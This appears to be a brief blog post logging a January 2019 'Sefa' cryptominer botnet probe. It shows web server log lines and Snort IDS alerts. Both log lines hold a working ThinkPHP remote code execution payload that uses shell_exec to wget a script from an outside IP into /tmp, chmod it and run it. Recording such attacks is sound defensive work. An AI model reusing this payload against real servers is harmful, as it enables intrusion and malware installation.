Sefa miner botnet | Joachim De Zutter
January 2019

Log entries:
167.99.214.206 - - [14/Jan/2019:00:18:57 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 404 207 "-" "Sefa"
167.99.214.206 - - [14/Jan/2019:00:19:12 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 404 207 "-" "Sefa"
Snort alerts:
01/14-00:18:57.339166  [**] [1:1330:6] WEB-ATTACKS wget command attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:18:57.339166  [**] [1:2026731:2] ET WEB_SERVER ThinkPHP RCE Exploitation Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:18:57.339166  [**] [1:2009363:7] ET WEB_SERVER Suspicious Chmod Usage in URI [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:44110 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:1330:6] WEB-ATTACKS wget command attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:2026731:2] ET WEB_SERVER ThinkPHP RCE Exploitation Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80
01/14-00:19:12.569297  [**] [1:2009363:7] ET WEB_SERVER Suspicious Chmod Usage in URI [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 167.99.214.206:47454 -> #.#.#.#:80

Multiple Cryptocurrency Miner Botnets Start to Exploit the New ThinkPHP Vulnerability